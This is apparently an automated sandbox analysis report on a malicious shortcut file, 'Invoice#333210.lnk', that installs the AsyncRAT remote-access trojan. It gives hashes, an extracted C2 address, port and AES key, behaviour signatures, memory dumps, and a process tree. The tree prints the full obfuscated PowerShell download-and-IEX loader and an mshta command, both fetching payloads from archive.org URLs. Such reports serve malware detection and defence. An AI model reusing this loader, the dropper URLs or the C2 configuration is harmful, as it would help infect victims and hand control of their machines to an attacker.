Analysis
-
max time kernel
62s -
max time network
145s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
24-07-2021 11:04
General
-
Target
Invoice#333210.lnk
-
Size
1KB
-
MD5
fd00b923c37b36bfda9a7d78e370f4fc
-
SHA1
a2f41a4e6f6778b8232054531f58aa083bcc455b
-
SHA256
9d5eef4b39df0149096f70bde04f9704e0740e93b1f7911d1ad7a79fb7918cf8
-
SHA512
b010dae295e3b2a25e158ff2b99d22c762d4b0f3fec6d8eb1a64b63946d7b6852254f955d7a377d40b4e77761b7a9017c8e1e0025b618be5eb49dde8834042c9
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://ia601405.us.archive.org/29/items/async-rat-stealer-hta-23456789/AsyncRAT_stealer_hta_23456789.txt
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://ia601503.us.archive.org/0/items/asyncRAT_stealer_all_32456789/asyncRAT_stealer_all_32456789.txt
Extracted
Family
asyncrat
Version
0.5.7B
C2
103.147.184.73:7920
Mutex
AsyncMutex_6SI8OkPnk
Attributes
-
aes_key
1DM6U4ipQ53iwuPgxDRkDV4Ly78xKAPF
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
103.147.184.73
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
7920
-
version
0.5.7B
aes.plain
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
-
Async RAT payload 2 IoCs
-
Blocklisted process makes network request 5 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Invoice#333210.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "https://ia601405.us.archive.org/29/items/async-rat-stealer-hta-23456789/AsyncRAT_stealer_hta_23456789.txt"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://ia601503.us.archive.org/0/items/asyncRAT_stealer_all_32456789/asyncRAT_stealer_all_32456789.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious behavior: AddClipboardFormatListener
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2232-116-0x0000000000000000-mapping.dmp
-
memory/2232-121-0x00000173F3D80000-0x00000173F3D81000-memory.dmpFilesize
4KB
-
memory/2232-124-0x00000173F3F30000-0x00000173F3F31000-memory.dmpFilesize
4KB
-
memory/2232-129-0x00000173F3D70000-0x00000173F3D72000-memory.dmpFilesize
8KB
-
memory/2232-130-0x00000173F3D73000-0x00000173F3D75000-memory.dmpFilesize
8KB
-
memory/2232-131-0x00000173F3D76000-0x00000173F3D78000-memory.dmpFilesize
8KB
-
memory/2232-142-0x00000173F3F00000-0x00000173F3F0E000-memory.dmpFilesize
56KB
-
memory/2352-114-0x0000000000000000-mapping.dmp
-
memory/2608-154-0x0000000005260000-0x0000000005261000-memory.dmpFilesize
4KB
-
memory/2608-148-0x0000000000400000-0x0000000000408000-memory.dmpFilesize
32KB
-
memory/2608-149-0x0000000000402DAE-mapping.dmp
-
memory/2608-156-0x0000000004E00000-0x0000000004E01000-memory.dmpFilesize
4KB
-
memory/2608-157-0x0000000004DA0000-0x0000000004DA1000-memory.dmpFilesize
4KB
-
memory/2608-158-0x0000000004D50000-0x0000000004D51000-memory.dmpFilesize
4KB
-
memory/2728-144-0x000000000040C71E-mapping.dmp
-
memory/2728-143-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/2728-159-0x00000000010D0000-0x00000000010D1000-memory.dmpFilesize
4KB
-
memory/2728-160-0x0000000005A50000-0x0000000005A51000-memory.dmpFilesize
4KB
-
memory/2728-162-0x0000000005AF0000-0x0000000005AF1000-memory.dmpFilesize
4KB